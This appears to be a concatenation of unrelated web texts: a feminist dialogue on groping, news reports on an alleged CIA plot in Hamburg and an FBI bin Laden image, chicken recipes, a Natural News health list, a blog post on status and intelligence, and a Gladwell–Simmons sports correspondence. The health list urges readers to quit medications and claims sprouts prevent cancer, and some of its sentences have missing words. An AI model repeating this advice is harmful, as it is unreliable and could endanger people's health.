And I think that people for some reason still conceive of gropers as people trying to “ flirt ” who are awkward and inappropriate and Go Too Far .
At least , some people .
So for a girl to respond with anger rather than , I guess … sympathy ?
Dating tips ?
A welcoming smile ?
That is just SO CRUEL .
AMANDA : That ’s the real crime .
I mean , the other thing that has been striking to me is how open victims of groping are to consider how their groper feels .
I ’ve spoken with women at length about what they think was going on in that guy ’s head when he rubbed his erect penis against her back , or whatever .
You know — - maybe it was an accident !
Maybe he did n’t mean to , maybe he was abused , maybe he can’t connect with women , maybe they learned it from their dad , maybe they do n’t have any other sort of social power and so they want to get it this way .
Because they want to know why this happened to them .
I seriously doubt that these poor , lost souls are giving the targets of their erections the same courtesy .
SADY : Yeah .
I mean , the point at which you casually assault someone is the point at which we can determine , objectively , that you do not give a fuck about how that person feels .
That ’s kind of the rationale : “ I want this , she has no right not to give me this , I will therefore have it without her permission .
And who gives a fuck about consequences !
I ’m getting off at the next stop ! ”
But that ’s part of women being expected to bear the burden of empathy ; the last thing you should do is be a person who does n’t TRY to care , so even when people act in an uncaring way , you try to figure out motivations or whatever instead of just dealing with their actions .
And that ’s not necessarily a bad way to be , unless you ’re in the presence of someone who takes advantage of it .
AMANDA : I ’m not sure I have anything else to say about groping right now .
I ’ve been kind of hitting the groping sauce pretty hard lately .
SADY : Lay off the sauce !
Perhaps you can get on the Job Discrimination Wagon !
Or enroll in a program for Pick - Up - Artist Methadone !
Truly , I think we have delved far enough into groping .
And for this , and for your excellent coverage , I thank you .
AMANDA : Does the Train to Gropetown stop anywhere near my house ?
SADY : Let us hope not .
I am less than fond of their preferred local entertainment .
Federal prosecutors in Hamburg are investigating claims that the CIA secretly plotted to assassinate a Syrian - German suspected al - Qaeda financier living in Hamburg .
In its January issue , US magazine Vanity Fair reported that the American intelligence agency secretly dispatched a hit team to Hamburg in 2004 to spy on and assassinate businessman Mamoun Darkazanli , 51 .
A spokesman for the Hamburg prosecutors office said it has launched an investigation into possible wrongdoing .
The magazine article states the CIA team , composed of employees of the private security firm Blackwater , did not inform German authorities of their presence .
The German government has denied any knowledge of the operation .
The CIA allegedly spied on Darkazanli for weeks without informing German authorities
But some opposition politicians are skeptical of the government 's ignorance .
Green party parliamentarian Hans - Christian Stroebele said it was the government 's job to monitor foreign intelligence agencies in Germany .
" It ca n't be true that they knew nothing , " Stroebele told the daily newspaper Hamburger Abendblatt .
Alleged 9/11 connections
The United States has long held that Darkazanli helped finance al Qaeda and had connections to the Hamburg - based terrorist cell that carried out the September 11 attacks .
He has repeatedly denied the allegations .
German authorities themselves investigated Darkazanli for years but never brought charges against him .
Police arrested him in October 2004 on a Spanish extradition request , but he was released on court order nine months later .
acb /dpa/AP/Reuters
Editor : Nancy Isenson
He suggested cutting the breast in half horizontally to make two thin pieces , then topping them with quick - cooking vegetables like mushrooms , zucchini or tomatoes , and roasting everything in a hot oven ( or toaster oven ) .
“ Americans call this cut ‘ chicken paillard , ’ ” said Mr. Ripert , who was born and trained in France .
“ I never heard that word before I came here . ”
I tried out his technique with oyster mushrooms , garlic and curry .
It was a snap to put together , so easy I was almost worried .
Fifteen minutes later , the kitchen smelled exotic and savory , and I had a supremely juicy and complexly flavored dish .
Even though chefs do n’t like chicken breasts , they do seem to know how to cook them .
I tried Zak Pelaccio of Fatty Crab next , hoping for something Asian - inspired .
“ I do n’t cook a lot of chicken breasts , ” he told me .
But he was able to give me a recipe for Hainanese chicken .
At the restaurant he cooks the chicken sous vide but recommended poaching it off the heat in a spicy , fragrant broth at home .
As instructed , I simmered chicken stock with chilies , garlic and ginger , then added the chicken breasts and turned off the heat .
While the chicken sat , I blended the same aromatics into a sauce .
It was so pungent and enticing that had the cooking gone wrong , I would have been happy eating that sauce on raw chicken .
But in the end , the breasts emerged from their bath tender and just cooked through , an utter delight to eat over rice moistened with the spicy broth .
Image Crispy stuffed chicken cutlets with ham , cheese and sauerkraut .
Credit ... Francesco Tonelli for The New York Times
Next , I went to Spain via Alexandra Raij from Txikito and El Quinto Pino .
She recommended a traditional Spanish dish called flamenquines , in which flattened chicken breasts are stuffed with ham and cheese , then rolled up , coated in egg and bread crumbs and fried .
Ms. Raij ’s touches were a sprinkling of black mustard seed or caraway in the filling along with an added kick of parsley and garlic in the eggs , a trick picked up from her mother ’s schnitzel .
MADRID —A Spanish lawmaker was horrified to learn that the FBI used an online photograph of him to create an image showing what Osama bin Laden might look like today .
The image using Gaspar Llamazares ’ photo appeared on a wanted poster updating the U.S. government ’s 1998 photo of the al - Qaida leader .
FBI spokesman Ken Hoffman acknowledged to the Spanish newspaper El Mundo that the agency used a picture of Llamazares taken from Google Images .
In a statement Saturday , the agency would say only that it was aware of similarities between their age - progressed image “ and that of an existing photograph of a Spanish public official . ”
“ The forensic artist was unable to find suitable features among the reference photographs and obtained those features , in part , from a photograph he found on the Internet , ” the FBI said in a statement to The Associated Press .
The wanted poster appeared on the State Department Web site rewardsforjustice.net , listing a reward of up to $ 25 million .
The FBI said the photo of bin Laden would be removed from the Web site .
Llamazares , former leader of the United Left party , was elected to Spain ’s parliament in 2000 .
The photograph of him used to make the wanted poster originally appeared on posters for his 2004 general - election campaign .
He said he would no longer feel safe travelling to the United States after his hair and facial wrinkles appeared on the bin Laden image .
“ I was surprised and angered because it ’s the most shameless use of a real person to make up the image of a terrorist , ” Llamazares said Saturday at a news conference .
“ It ’s almost like out of a comedy if it did n’t deal with matters as serious as bin Laden and citizens ’ security . ”
Llamazares planned to ask the U.S. government for an explanation and said he reserved the right to take legal action .
Llamazares said he was concerned to see the government resorting to what he called sloppy techniques , especially in the light of recent terrorism alerts such as the attempted Christmas Day bombing of a Detroit - bound airplane .
“ It might provoke mirth , but it demonstrates that what we ’re seeing from security services is n’t exactly recommendable , ” he said .
Llamazares said he has “ no similarity , physically or ideologically ” to bin Laden .
They do share one trait — both are 52 .
Jose Morales , spokesman for Llamazares ’ party , was surprised that computer images such as the retouched bin Laden photo were made using photos of real people .
Bin Laden , who is wanted in the Sept. 11 , 2001 , terrorist attacks and the 1998 U.S. embassy bombings in Tanzania and Kenya , is believed to be hiding in the lawless Pakistan frontier bordering Afghanistan .
His exact whereabouts have been unknown since late 2001 , when he and some bodyguards slipped out of the Tora Bora mountains after evading air strikes , special forces and Afghan militias .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Read more about :
( Natural News ) The New Year is upon us , and for many people , it includes a New Year 's resolution for achieving improved health and happiness in 2010 .
Here are twenty - five health - enhancing ideas to help you accomplish that goal .
#1 - Replace sodas or soft drinks with tea or water .
#2 - Commit to eating one raw fruit ( or serving of vegetables ) at every meal .
#3 - Add just 5 minutes a day to your exercise routine .
Do n't have an exercise routine ?
Start with 5 minutes a day !
#4 - Get more sunshine !
#5 - Learn some Pilates .
It 's probably the # 1 exercise system for core strength and flexibility .
#6 - Drink a superfood smoothie every day .
#7 - Buy more indoor plants :
They purify the air in your home .
#8 - Take a quality , wild - harvested fish oil supplement that contains vitamin D.#9 - Eat more quinoa :
It 's a high - protein , low - carb " grain " that can easily replace rice or couscous .
#10 - When you get out of bed each morning , do five sit-ups first .
It sounds simple , but just 5 sit-ups a day can make a difference .
#11 - Instead of trying to find a parking spot so close to the grocery store , park farther away .
You 'll get a little more walking exercise and a little more sunshine .
#12 - Get a good water filter so you can stop drinking tap water ( or bottled water ) .
#13 - Pick up a " gentle " art like Tai - Qi or Yoga .
It will reduce your stress and improve your physical stamina .
#14 - Take a relaxing hot bath with epsom salts and soothing herbs like lavender .
It will do wonders for your mind and your muscles .
#15 - Get a professional massage !
Massage therapy is really , really healthy , and it's a great way to reward yourself for some of the other accomplishments you 're making .
#16 - Grow your own sprouts !
With a simple , low - cost sprouting machine , you can grow and eat your own sprouts .
Eating just one ounce of sprouts a day still had a huge impact on preventing cancer and boosting immune function .
#17 - Prepare for a Spring garden .
Sure , it 's cold and snowy right now , but make a commitment to start a garden this Spring , and you 'll reap many health benefits in the months ahead .
#18 - Get a mini- trampoline and do somein your living room .
You can even watch movies or documentary DVDs at the same time .
#19 - Make a point to get at least eight hours of sleep for 2 - 3 nights a week ( or more , if you can ) .
Most people are sleep deprived , and the health cost is enormous .
#20 - Start visiting local farmer 's markets so that youin 2010 .
You 'll be healthier and happier as a result .
#21 - Got a job you do n't like ?
Quit it !
Downgrade your lifestyle to live on less money , then .
Being happy in a small house is better than being miserable in a big one .
#22 - Get off those medications !
Make a point to learn how to safely and gradually get yourself off all the medications you can by eliminating underlying imbalances or illnesses .
The fewer medications you take , the healthier you 'll be !#23 - Throw out your television !
Are you still watching cable TV or satellite TV ?
It 's a complete waste of your life ( but you already knew that ) .
Disconnect the cable .
Read more books and get your information online where news sources are more independent and intelligent .
#24 - Make a decision to think of food asinstead of .
Eat what your body needs , not what your taste buds desire .
#25 - Teach others how to be healthy !
The more you talk with others about healthy habits , the more you 'll follow them yourself .
:-)
That 's it !
I hope you enjoyed these 25 ideas for improving your health in 2010 ( and beyond ) .
Of course , one of the best ways to keep improving your health in 2010 is to We 'll be bringing you more natural cures , herbal remedies and self - care tips throughout 2010 .
I 'm personally looking forward to sharing a great year with you !
Michael Vassar once suggested : " Status makes people effectively stupid , as it makes it harder for them to update their public positions without feeling that they are losing face . "
To the extent that status does , in fact , make people stupid , this is a rather important phenomenon for a society like ours in which practically all decisions and beliefs pass through the hands of very - high - status individuals ( a high " cognitive Gini coefficient " ) .
Does status actually make people stupid ?
It 's hard to say because I have n't tracked many careers over time .
I do have a definite and strong impression , with respect to many high - status individuals , that it would have been a lot easier to have an intelligent conversation with them , if I 'd approached them before they made it big .
But where does that impression come from , since I have n't actually tracked them over time ?
( Fundamental question of rationality : What do you think you know and how do you think you know it ? )
My best guess for why my brain seems to believe this : I know it 's possible to have intelligent conversations with smart grad students , and I get the strong impression that high - status people used to be those grad students , but now it 's much harder to have intelligent conversations with them than with smart grad students .
Hypotheses :
Vassar 's hypothesis :
Higher status increases the amount of face you lose when you change your mind , or increases the cost of losing face .
The open - mindedness needed to consider interesting new ideas is ( was ) only an evolutionary advantage for low - status individuals seeking a good idea to ride to high status .
Once high status is achieved , new ideas are high - risk gambles with less relative payoff - the optimal strategy is to be mainstream .
I think Robin Hanson had a post about this but I can't recall the title .
Intelligence as such is a high - cost feature which is no longer necessary once status is achieved .
We can call this the Llinas Hypothesis .
High - status individuals were intelligent when they were young ; the observed disparity is due solely to the standard declines of aging .
High - status individuals spend more time on dinners and politics , and less time on problem - solving and reading ; they exercise their minds less .
High - status individuals are under less pressure to perform , in general .
High - status individuals are just as smart as they ever were , but when you or I try to approach them , the status disparity makes it harder to converse with them - they would sound just as intelligent if we had higher status ourselves .
High - status individuals feel less social pressure to listen to your arguments , respond articulately to them , or change their minds when their own arguments are inadequate , which decreases their apparent or real intelligence .
High - status individuals become more convinced of their ideas ' rightness or of their own competence .
High - status individuals get less honest advice from their friends , especially about their own failings .
Did I miss anything important ?
Having achieved some small degree of status in certain very limited circles , here 's what I do to try to avoid the status - makes - you - stupid effect :
You know Malcolm Gladwell as the best - selling author of " The Tipping Point , " " Outliers " and " Blink . "
You know him because " What The Dog Saw , " his latest best - seller , has been flying off bookshelves for the past two months .
You know him from his award - winning New Yorker articles .
You know him because we tried this gimmick two other times for ESPN.com : in 2006 and earlier this year .
And now ?
We 're trying it again .
Like you did n't have enough distractions over the holidays , here are nearly 10,000 words of e-mails Gladwell and I exchanged about Kobe , Tiger , concussions , Donaghy , capitalization rates , celebrity sightings and everything else you can imagine .
For Part 2 , CLICK HERE .
This is Part 1 .
Gladwell leads us off .
GLADWELL
Wait .
How did I get roped into this again ?
Oh , right .
Because both of us released books this fall and we thought we should engage in a little shameless self - promotion during the Christmas rush .
SIMMONS
Yeah , this could end badly .
I also worry about the third act of anything .
For instance , when Hollywood follows a sequel with the dreaded " III , " the concession is usually , " We knew this was going to suck , but we could n't resist cashing in on this franchise one last time . "
I hope that 's not us .
But you got me thinking third movies ( re-sequels ? ) can veer in one of four directions :
No .
1 : Really , really , excruciatingly bad .
" Halloween III " did n't even have Michael Myers in it .
" Karate Kid III " was so inexplicable that it's now one of the funniest comedies of the ' 80s .
" Godfather III " had the single biggest casting misfire of our lifetimes ( Sofia Coppola as Michael Corleone 's daughter ) .
" Home Alone III " made the fatal mistake of not bringing back Macaulay Culkin .
The third " Naked Gun " was sneaky horrible .
Same for " American Wedding " ( the third " American Pie " movie ) .
History will tell whether " Matrix III " joins this group ; right now , it 's on the fringe .
Of course , the worst re-sequel of all time was " The Bad News Bears Go to Japan . "
Everyone just seems really sad , as if it's an elaborate kidnapping video .
It 's deeply disturbing .
I do n't think this is us even on our worst day .
No .
2 : Watchable , but ultimately leaves you cold .
And it leaves you cold for this reason :
From almost the first scene , it becomes abundantly clear that all parties are involved simply because ( A ) someone wrote out gigantic checks to lure everyone back and / or ( B ) the studio was trying to establish a franchise .
Some good examples : " Die Hard : With a Vengeance , " " Rush Hour III , " " Robocop III , " " Ocean 's 13 , " " Batman III , " " Spiderman III , " " Beverly Hills Cop III , " " Child 's Play III , " " Mission Impossible III , " " Shrek III , " " Saw III , " " Terminator III , " " Pirates of the Caribbean III , " " Scream III , " " Back to the Future III , " " Mad Max Beyond Thunderdome , " " Alien III , " " Friday the 13th Part 3 - D " and " Harry Potter III : Post - Puberty & A Little Horny . "
I 'd say that 70 - 75 percent of all re-sequels end up here .
No .
3 : Entertaining and worthy because it ties up all loose ends and / or reinvents the franchise to some degree .
I refuse to sit through " The Lord of the Rings , " but apparently that 's a great example for this .
Whatever .
Examples I have seen ( and liked ) : " The Bourne Ultimatum , " " Return of the Jedi , " " Indiana Jones and the Last Crusade , " " Lethal Weapon III , " " Fast & the Furious III , " " The Good , the Bad and the Ugly " and " Goldfinger " ( the best of Connery 's Bond movies ) .
No .
4 : Rocky III .
The holy grail of re-sequels .
Gets its own category .
I do n't know , Gladwell .
I mean I would love to give the world a " Rocky III " here , and I 'd even settle for " Goldfinger , " but the percentages point to this becoming our " Die Hard : With a Vengeance . "
It 's Christmas time , and we have books to sell .
Our motives are pretty clear .
If it 's OK with you , even though I 'm the white guy and you 're the biracial Canadian , I 'd like to be Sam Jackson and you can be Bruce Willis .
GLADWELL
The ultimate re-sequel ?
Jenna Bush running for president in 2040 .
I 'm not sure we 're at that level yet .
Shall I kick things off ?
I know we 're only a few weeks into the NBA season , but I was curious if anything has happened so far that makes you want to rethink your Hall of Fame pyramid .
Do you have any regrets about " The Book of Basketball " ?
I know I do .
I botched the introduction to your book .
I was trying to suggest to the reader , as gently as I could , that you were a kind of Rain Man when it came to pro basketball -- someone whose extreme basketball knowledge might be considered , as the psychologists like to say when they are treading delicately , a " compensation strategy " -- and I left out my two best examples !
First story : I go to a party in New York and run into a man who proceeded to tell me a long story about this affair he had when he was a teenager with an older man who , it turns out , happened to have been an NBA star at the time .
If memory serves , I gave you the city where the affair took place .
First guess : bull 's - eye !
SIMMONS
Great , you just started a 17 - day frenzy on the Internet of people trying to figure out that player 's identity .
Also , I think my editors just had a collective heart attack .
Hold on , I have to revive them .
I 'll be right back .
GLADWELL
Second story : Maybe three years ago , I 'm in Paris , walking through the lobby of one of those seriously swanky and stuffy Parisian hotels on my way to meet a friend , and I run across an NBA player deep in conversation with the concierge about what shows were up at the Louvre .
I e-mailed you immediately .
Remember ?
I believe the exchange went something like this .
Me : " There is a 7 - foot NBA player talking art in the lobby of the George V . "
You : " Adonal Foyle is in Paris ? ? ? "
Did you ever wonder how much better off humanity would be if you had put your brain to more productive uses ?
SIMMONS
Come on , who else would it have been ?
It was n't going to be Chris Kaman .
I also think I tried ( unsuccessfully ) to persuade you to do a feature on him .
He grew up in the Grenadines , graduated summa cum laude from Colgate with a history degree , founded a nonprofit organization called Democracy Matters that tries to curb spending in political elections , and was more intelligent and well - rounded than anyone covering him .
Putting Foyle in the NBA was almost a social experiment .
Why has n't he written a book ?
Why has n't someone written a book about him ?
At the very least , NBATV should give him a reality show in which Foyle takes Marcin Gortat , Ryan Anderson and Dwight Howard under his wing on road trips and broadens their horizons in various ways .
I would watch this show .
Although that 's not saying much .
GLADWELL
This is what the whole Tiger Woods mess has made clear , I think ( and I 'm sure we 'll get back to him later ) :
We have such incredibly narrow views of what sports celebrities are like .
We just can't imagine them as having the full range of human needs and interests .
I mean , why should n't Adonal Foyle be an art lover ?
SIMMONS
It reminds me of the time those three guys came up to you in a restaurant in Chicago and told you that they were reading " The Tipping Point " in their book club and were big fans .
GLADWELL
How could I forget ?
SIMMONS
Baron Davis , Stephen Jackson and Matt Barnes .
GLADWELL
Greatest moment of my life .
SIMMONS
You know who was on that Warriors team ?
Adonal Foyle !
I guarantee he started the club .
See , that could have been a whole episode of his reality show , " Foyled . "
This week , Adonal tries to start a book club on the Warriors , but things go terribly wrong when Stephen Jackson and Andris Biedrins get into a heated argument about " Slaughterhouse Five . "
Anyway , I think you 're right that sports fans are guilty of " athletic profiling . "
Allen Iverson has cornrows and tattoos , and he shows up late for practice , and he takes too many shots , so this means he is n't articulate and self - aware ( even though he is ) .
Rasheed Wallace was the leader of the Jail Blazers , and he yells at refs and has tattoos , so this means that he does n't have a high basketball IQ ( even though he does ) .
Mariano Rivera keeps a low profile , is super - religious and does n't say much publicly , so this means he has nothing to say ( even though Peter Gammons , in his farewell piece for ESPN.com , called him the single most distinctive athlete he covered ) .
Bill Belichick gives monotone answers in news conferences , so this means he does n't have a sense of humor ( even though everyone who knows him swears he does ) .
In all of those cases , our learned perceptions were wrong .
GLADWELL
Years ago , I did a story on Tupac , and I tracked down some poems he wrote when he was in high school .
They were all about flowers and sunsets and warm kisses .
Before there was thug life , apparently , there was hug life .
Who knew ?
SIMMONS
I can guarantee that " Hug Life " would not have sold 5 million records .
With all of that said , though , if you had told me that Chris Kaman was in Paris asking about shows at the Louvre , I would not have believed you and would 've started glancing around to see if I was being videotaped for some pranking pilot .
GLADWELL
My friends and I used to play a game where we rated celebrity sightings according to the " sight - site " index .
The celebrity was ranked on a 1 - 10 scale .
Then the place where you saw the celebrity was ranked on a 1 - 10 scale , according to its unlikeliness , and the two numbers were multiplied to rank the sighting ; 100 , of course , is a perfect score .
No one 's ever gotten that .
Chris Kaman talking art in the lobby of the George V would have been close .
SIMMONS
My most unlikely celebrity sighting ever : During the horrible Super Bowl week in Jacksonville , I was attending the Maxim party in 50 - degree weather that had barely any celebrities attending because , again , they decided to hold the Super Bowl in Jacksonville .
At some point during the night , I was next in line to use one of the port - a - johns , which were stacked behind the party in some seedy , dark field .
So I 'm standing there thinking , " This sucks , " and the port - a - john door opens .
Who comes out ?
Katie Holmes .
Taller and much more beautiful than I expected .
We locked eyes , and she made that cute / crooked Katie Holmes " Some weird dude is staring at me incredulously " smile that she used to flash all the time before Tom Cruise got ahold of her .
Then she walked by me and headed back to the party .
And I headed into the disgusting port - a - john .
Not even a month later , she signed with Cruise .
Whoops , I mean , she fell for Cruise .
I 'm saying that " Katie Holmes + port - a - john + a few weeks before Cruise got ahold of her " was at least a 92 on your scale .
GLADWELL
I 've actually shelved the sight - site index .
John Hollinger 's celebrity rating system is way better .
SIMMONS
To answer your rankings question about my book from five tangents ago , I have many small regrets ( to be expected ) and one big one : Putting Iverson ( No. 29 ) too high .
That was the one Pyramid - related instance of my affection for someone clouding my judgment to some degree .
If I could do it over again , Level 3 of the Pyramid would start with George Mikan at No. 36 , then the George Gervin / Sam Jones combo , then Iverson at No. 33 , then Kevin McHale , then Dave Cowens and Willis Reed .
But as I rattle off this group again , I 'm realizing that Dirk ( the league 's best clutch scorer and its third most important player behind LeBron and Kobe ) and Nash ( having a vintage Nash season and reinventing the whole " D'Antoni 's offense made Nash " argument to the point that you could make a much better case that Nash made D'Antoni ) are enjoying such renaissances that they might have bulldozed their way into Level 3 .
So maybe Nash jumps to No. 36 and Dirk vaults past Iverson to No. 32 .
One of only two changes I can guarantee for the paperback : Adding a footnote in Iverson 's section about the jaw - dropping parallel between A.I. hitting rock bottom , then making an emotional , sobbing return to Philly and Dirk Diggler hitting rock bottom , then making an emotional , sobbing return to Jack Horner 's house in " Boogie Nights . "
At least 20 readers e-mailed me about this .
Sure , adding that point will require me to remove another " Boogie Nights " - related footnote from a different part of the book because we were at capacity , but it has to be done .
GLADWELL
How much would I fall in your estimation if I admitted I 've never seen " Boogie Nights " ?
Go on
SIMMONS
I can't say that I 'm surprised .
You 're the same person who fell in love with the NBA as a kid by reading Sports Illustrated issues in your local Canadian library .
The other obvious change : Kobe 's section needs to be rewritten .
I can't remember anyone reinventing himself historically as well as Kobe did these past 16 months .
The Olympics , then the 2009 Finals , then the media victory lap that everyone ate up and then , when it seemed as if we were headed for a decline , he reinvented himself as the second coming of post - baseball Jordan and developed an even nastier , more physical post - up game than MJ had .
I can't believe what I am watching .
It 's staggering .
He 's like a 6 - foot - 6 Hakeem Olajuwon .
I went into this season thinking Kobe would be able to last just one or two more seasons at a high level ; now I 'm wondering whether he could play like this well into his late 30s .
Why not ?
I mean , Karl Malone did it .
Like Malone , Kobe is a workout freak who takes care of his body and seems predisposed to staying healthy , anyway .
Malone averaged a 26 - 10 and made second - team All - NBA in the 1999 - 2000 season when he was 36 years old and then he played four years after that .
Kobe is only 31 .
Could he replicate Malone 's longevity and consistency ?
Let 's say he plays five more years at this level and averages 25 - 26 points a game , plays in two more Finals ( winning one ) and makes three first - team All - NBAs and two 2nd - team All - NBAs .
( Conceivable . )
Here 's how his hypothetical résumé would look after the 2014 - 2015 season : five rings and eight Finals appearances in all 34,000 - plus points ( third all time ) 1,300 - plus games ( the record is 1,611 , held by Robert Parish ) nearly 6,000 playoff points ( close to the record of 5,987 , held by MJ ) 10 first - team All - NBAs , four second - teams and two third - teams .
Again , that 's a reasonable scenario .
So if he stays healthy and keeps playing at this level , he would eventually become the Kareem of non-centers : either the third or fourth best player in the history of the league .
Meanwhile , just 26 months ago , the Lakers were shopping him and he seemed destined to leave .
I think this is startling .
GLADWELL
I think you 're right .
As a general rule , I think we should always give special consideration to longevity , and weight a good season late in someone 's career more than a very good season early in his career .
To me , Olympic swimmer Dara Torres is far and away the greatest athlete of our generation .
She 's been a world - class athlete for 25 years , in a sport where women often peak in their late teens .
She set an American record in the 50 free when she was 40 .
And the finest athletic performance of the past decade has to have been Tom Watson 's win at the British Open this year at age 59 , with an artificial hip no less -- and I say " win " because even though he finished second in a playoff , I think we can all agree that the difference between his play and Stewart Cink 's play that weekend was effectively zero .
When you revisit the Hall of Fame pyramid , I 'd love to see you factor in age - weighted performance :
Surely the ability to compensate for the inevitable effects of getting older is a hugely important part of the definition of a great athlete .
SIMMONS
But age - weighted performance is era-specific to some degree .
Think of the advantages for today 's athletes with dieting and nutrition , personal training , exercise equipment , athletic equipment , medicine , sneakers , surgeries and first - class travel .
Is there any way Dara Torres could have had her career in 1955 ?
Of course not .
We have infinitely more information about our bodies than we once did ; we have better ways ( and sometimes illegal ways ) to keep them strong ; we have much better ways of fixing them if anything goes wrong ; and we have better equipment to help them reach optimal efficiency .
Back in Bill Russell 's era , those guys were eating unhealthy food , smoking cigarettes , wearing crummy Converses , avoiding the gym and flying coach .
None of them played past 33 to 35 .
It was impossible .
Now ?
You can play until your early 40s if you take care of yourself and are predisposed to staying healthy .
You can bounce back from any injury unless it 's one of those Shaun Livingston - like knee explosions .
In the '60s , '70s and ' 80s , if you blew out a knee , you were never the same .
These days , someone like Al Jefferson can be back in 10 months .
GLADWELL
Yes .
You can only do longevity comparisons within generations .
Torres ' accomplishment is that of the swimmers who first went to the Olympics in 1984 , she 's the only one who was still an Olympian in 2008 -- where , I should add , she medaled .
That accomplishment deserves special consideration .
Same with Tom Watson .
Every other senior golfer of his era has access to the same training techniques as he does -- but he was the only one in contention at this year 's British Open .
( By , the way , that Derek Jeter and not Watson was Sports Illustrated 's athlete of the year was a crime .
For Jeter to have had the year Watson did , he would have had to lead the Yankees to a World Series title in 2033 . )
SIMMONS
I can't wait to see how this plays out in the NBA .
When you consider the influx of foreigners , the extended shelf lives of quality careers , the medicine / health strides , the positive impact of the rookie salary scale , the successful drug policy and the equally successful one - year waiting period for high schoolers , for the first time since the early '90s , you can make a case that the NBA finally has enough talent to stock every one of its teams .
Recently , I watched my Celtics almost lose to Memphis and found myself thinking , " Wait a second is Memphis secretly good , or did my wife spike my drink ? "
And they 're 10 - 14 .
Really , there are only two hopeless teams right now : Minnesota and New Jersey .
Every other team has enough talent to beat any other team on any given night .
So why is this ?
Well , an unusual number of stars from the 1995 - 99 drafts ( Nash , Dirk , Duncan , Pierce , Kobe , etc. ) extended their peaks past the typical drop - off point .
An unusual number of under - 24 potential stars ( Durant , Howard , Paul , Rose , Roy , etc. ) are coming through .
And nearly every " franchise player " in the 25 - 29 age range ( LeBron , Melo , Howard , Bosh , Wade , etc. ) have seized their primes and almost - primes .
And if you want to dig deeper , potential stars rarely get sidetracked by drugs , money or injury anymore .
This decade , have you noticed how few Derrick Colemans or Ralph Sampsons we had ?
Gilbert Arenas and Amare Stoudemire never became superstars , but you would n't call them busts .
Yao Ming 's body broke down , but he was n't exactly this generation 's Bill Walton .
T - Mac and Vince failed to fulfill their potential , but they were n't exactly disasters .
Other than the usual slew of draft busts such as Darko and Morrison ( who were improperly evaluated to begin with ) , there just are n't many talents about which we can say ( as we did with Kenny Anderson once upon a time ) , " I 'm still confused why did n't that guy make it ? "
And it goes back to those era-specific advantages .
Athletes have a significantly better chance of succeeding now .
And for longer .
To a degree , this goes without saying .
But it 's something we always forget .
Kobe will enjoy a longer prime than Jordan did because of his era and only because of his era .
And because Jordan got suspended for gambling .
( Just kidding , just kidding .
I could n't resist . )
GLADWELL
What we 're talking about is what are called capitalization rates , which refers to how efficiently any group makes use of its talent .
So , for example , sub -Saharan Africa is radically undercapitalized when it comes to , say , physics :
There are a large number of people who live there who have the ability to be physicists but never get the chance to develop that talent .
Canada , by contrast , is highly capitalized when it comes to hockey players :
If you can play hockey in Canada , trust me , we will find you .
One of my favorite psychologists , James Flynn , has looked at capitalization rates in the U.S. for various occupations :
For example , what percentage of American men who are intellectually capable of holding the top tier of managerial / professional jobs actually end up getting a job like that .
The number is surprisingly low , like 60 percent or so .
That suggests we have a lot of room for improvement .
What you 're saying with the NBA is that over the past decade , it has become more and more highly capitalized :
There is n't more talent than before , but there is -- for a variety of reasons -- a more efficient use of talent .
But I suspect that in sports , as in the rest of society , there 's still an awful lot of room for improvement .
Case in point : Everyone always says what an incredible advantage it has been for Peyton Manning to have had the same offensive coordinator and the same offensive system his entire career .
Football offenses are so complex now that they take years to master properly , and having one system in place from the beginning has allowed Manning to capitalize on every inch of his talent .
On the other hand , someone like Jason Campbell has had a different offensive coordinator in virtually every season of his pro and college career ( and I 'm guessing he 'll get another this offseason ) .
I 'm not convinced that it 's possible to say , with certainty , that Campbell has less ability than Manning .
I 'm only sure we can say that Campbell has not been in a situation that has allowed him to exploit his talent the way Manning has .
We just do n't know how good he is capable of being -- and we may never know .
SIMMONS
I like the capitalization concept .
The best NBA example : From 1990 to 1996 , the league 's lack of a rookie salary cap combined with skyrocketing salaries led to absolute chaos .
Younger stars were earning too much money too soon and had too much control of their own destiny ; not just who coached them but where they played and who played with them .
And the league removed any incentive they would have had to improve by making them filthy rich immediately .
Nearly all of them handled it poorly : C - Webb , Coleman , Anderson , Marbury , Big Dog , LJ , Kemp , Baker that 's a lost generation , to some degree .
Flipping it around , Kobe is the best overcapitalization example other than Malone ( who came along in the right era and had the perfect teammate and coach for his game ) .
Kobe works harder off the court than anyone in the league ; we have so many ways for him to improve in 2009 that he 's like a kid in a candy store .
We 've all heard the story about how he worked out with Hakeem all summer to refine his post game , so here 's one you might not have heard :
When I visited Nike last month , we toured the development building ( in which they customize sneakers for specific athletes ) , and the guy who ran it told us that Kobe was their favorite client .
Why ?
Because he kept pushing them and pushing them to make the right shoes for him , even flying there for days at a time just to put himself through grueling workouts with sensors all over his body .
This past summer , he pushed them to create a special low - top sneaker that also would prevent him from rolling his ankles -- which seems incongruous on paper -- yet they feel as if they pulled it off .
And only because he kept pushing them .
Forty years ago ?
He 's wearing crummy Chuck Taylors like everyone else .
That 's why it was so hard to measure players against one another in my book .
Every era has some sort of monkey wrench , and going forward , I think the advances of the past 25 years are going to throw everything out of whack .
We need a formula to prorate the longevity of pre-1990 careers .
Kareem , Nolan Ryan , Gordie
Howe their careers were the equivalent of someone playing 30 years in today 's era , right ?
How did they do it ?
GLADWELL
In that generation , the people with extraordinarily long careers were true outliers :
They were physical freaks .
Roger Craig has run a half - dozen or so marathons since retiring from the San Francisco 49ers .
Can you believe that ?
I 've been a long - distance runner my whole life .
I weigh 100 pounds less than Craig , and I did not spend my formative years getting beaten up on a football field -- and I would never race at that distance .
It 's too punishing .
But I 'm not Roger Craig -- who somehow emerged from 10 years of getting pounded on every play in the NFL feeling so spry that he decided to take up marathoning .
What 's happening now is that medicine is allowing the rest of us to catch up with the outliers .
The impact of scientific progress on human performance is greatest not at the top but in the middle :
It helps the guy who would have played five years play 10 years .
It does n't help the Nolan Ryans or Roger Craigs all that much .
They do n't need any help .
SIMMONS
This topic can even extend to Hollywood .
Sandra Bullock is still carrying chick flicks and heartwarming Disney - esque movies at age 45 , with no signs of slowing down .
She 's like the Nolan Ryan of chick flicks .
As far as I can tell , she has n't had any major work done .
And even though you 'd never put her peak against Meg Ryan 's peak , at this point , you 'd have to give Bullock the career edge , the same way I gave Malone the slightest of edges over Barkley in my book .
But comparing her historically to other leading actresses from earlier generations , it becomes unfair .
For instance , look at Goldie Hawn 's best movies from 1974 to 1980 :
1974 : " Sugarland Express "
1975 : " Shampoo "
1978 : " Foul Play "
1980 : " Seems Like Old Times "
1980 : " Private Benjamin "
At this point , she 's 35 years old .
With today 's advantages , she would have had a monster 10 years ahead .
